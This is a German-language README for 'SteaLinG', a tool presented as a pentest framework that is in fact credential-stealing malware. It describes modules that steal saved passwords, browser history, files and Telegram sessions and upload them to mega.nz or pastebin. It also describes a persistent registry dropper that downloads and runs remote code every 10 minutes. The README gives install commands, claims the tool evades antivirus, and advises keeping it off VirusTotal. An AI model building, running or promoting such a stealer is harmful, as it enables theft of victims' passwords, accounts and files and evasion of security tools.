
The SteaLinG ist ein Open-Source-Penetrationstest-Framework, das für Social Engineering entwickelt wurde.
SteaLinG ist ein Open-Source-Penetrationstest-Framework, das für Social Engineering entwickelt wurde. Nach dem Hack kannst du es auf das Gerät des Opfers hochladen und ausführen.
Dies ist nur für Testzwecke und darf nur verwendet werden, wenn eine ausdrückliche Zustimmung erteilt wurde. Verwende dies nicht für illegale Zwecke.
Aufgrund der Schließung von anonfiles.com habe ich den Code geändert, und jetzt lädt er die Ergebnisse auf mega.nz hoch.
| Modul | Kurze Beschreibung |
|---|---|
| Passwörter auslesen | Stehle alle gespeicherten Passwörter, lade die Passwort-Datei auf mega -pastebin hoch |
| Chronik auslesen | Browser-Chronik auslesen, lade die Chronik-Datei auf mega -pastebin hoch |
| Dateien auslesen | Stehle Dateien von der Festplatte mit der gewünschten Erweiterung, lade auf mega hoch |
| Telegram-Sitzungs-Hijacking | Telegram-Sitzungs-Hijacking, lade auf Mega hoch |
| Dropper | Siehe unten |
| Modul | Kurze Beschreibung |
|---|---|
| 1-Telegram-Sitzungs-Hijacking | Telegram-Sitzungs-Hijacking |
C:\Users\<PC-Name>\AppData\Roaming\Telegram Desktop
im Ordner 'tdata'C:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
Sobald du diesen Ordner mit all seinem Inhalt auf dein Gerät im selben Pfad verschoben hast, musst du nur noch die erforderliche Aktion durchführen. Das Tool kümmert sich um alles, und du musst nur deine E-Mail und dein Passwort auf der Website https://mega.nz/ angeben. Der erste Schritt ist, zum Speicherort der tdata-Datei zu navigieren und sie dann in eine ZIP-Datei zu konvertieren. Wenn Telegram korrekt funktioniert, tritt dieser Fehler nicht auf. Falls doch, bedeutet dies, dass Telegram geöffnet ist, und du solltest seine Prozesse beenden. Dir wird auffallen, dass dieses Verhalten bösartig ist, daher habe ich es durch try und except im Code vollständig vermieden. Der Name der Archivdatei wird mit dem Namen des Opfergeräts verwendet, denn wenn du mehrere Geräte hast, kannst du zwischen ihnen unterscheiden. Danach sendest du eine Anfrage für die ZIP-Datei auf der mega-Website mit der E-Mail und dem Passwort. Das ist alles. Es wird von keinem Antivirenprogramm erkannt.
| Modul |
|---|
| 2- Dropper |
.exe oder .png oder eine andere wichtige Erweiterung sein. Wichtig ist, dass der Link mit einer Erweiterung (.irgendeine Erweiterung) endet.
Das Zweite ist, den API-Key von dir zu erhalten, den du ebenfalls bereitstellst. Du kannst dich registrieren und auf das Wort "API" klicken, um ihn zu finden, und dir dann den Benutzernamen und das Passwort notieren.
Als Erstes erstellst du einen privaten Paste auf der Website. Danach fügt er die von dir bereitgestellte URL hinzu und gibt dir die ausführbare Datei (exe) aus. Ihre Funktion ist es, sich selbst auf zwei verschiedene Arten in die Registrierung des Geräts einzutragen, wenn sie auf einem beliebigen Gerät ausgeführt wird.
Zuerst öffnet sie die Pastebin-Website und fügt den von dir erstellten speziellen Paste ein. Dann nimmt sie die Paste-URL, lädt deren Inhalt herunter und führt ihn aus. Zusätzlich kannst du jederzeit eine andere URL eingeben. Das ist völlig normal, da der Dropper die URL alle 10 Minuten überprüft. Wenn er eine neue URL findet, lädt er deren Inhalt herunter, verbindet sich mit ihr und läuft weiter. Du musst nichts weiter tun. Daher kannst du alle 10 Minuten von überall auf dein Gerät zugreifen.
3- Linux-Unterstützung
4- Du kannst jetzt zwischen Mega oder Pastebin wählen
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python3 -m pip install -r requirements.txt
python SteaLinG.py
* Lade es nicht auf VirusTotal.com hoch, denn dieses Tool wird nach einiger Zeit nicht mehr funktionieren.
* Virustotal teilt Signaturen mit AV-Unternehmen.
* Und nochmal: Sei kein Idiot!

